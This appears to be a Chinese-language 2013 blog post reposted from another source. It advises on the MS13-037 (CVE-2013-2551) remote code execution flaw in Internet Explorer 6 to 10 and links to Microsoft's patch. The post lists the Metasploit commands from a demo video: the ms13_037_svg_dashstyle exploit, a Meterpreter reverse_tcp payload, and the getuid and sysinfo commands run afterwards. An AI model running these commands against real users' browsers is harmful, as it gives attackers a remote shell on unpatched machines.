2013年6月13日 星期四

微軟 MS13-037 IE 6~10 嚴重等級的漏洞(含影片示範)

微軟 MS13-037 IE 6~10 嚴重等級的漏洞(含影片示範)

發佈日期:2013/3/7(由 VUPEN 首次發現)、2013/6/12(發佈概念驗證程式 PoC)
影響版本:Microsoft Internet Explorer 6 ~ 10
漏洞編號:
CVE-2013-2551
MS13-037

說明:
會在使用者以 Internet Explorer 檢視蓄意製作的網頁時,允許遠端執行程式碼。
成功利用其中最嚴重的資訊安全風險的攻擊者,可以取得與目前使用者相同的使用者權限。

官方網站說明:
http://technet.microsoft.com/zh-tw/security/bulletin/ms13-037

解決方案:
請盡速更新 IE MS13-037的修正程式

修正程式下載處:
https://support.microsoft.com/kb/2829530

影片內指令:
use exploit/windows/browser/ms13_037_svg_dashstyle
set SRVHOST 192.168.178.36
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.36
exploit

getuid
sysinfo

參考資料來源:
http://eromang.zataz.com/2013/06/12/cve-2013-2551-ms13-037-internet-explorer-vulnerability-metasploit-demo/
http://www.vupen.com/blog/20130522.Advanced_Exploitation_of_IE10_Windows8_Pwn2Own_2013.php


轉載自《網路攻防戰》

沒有留言:

張貼留言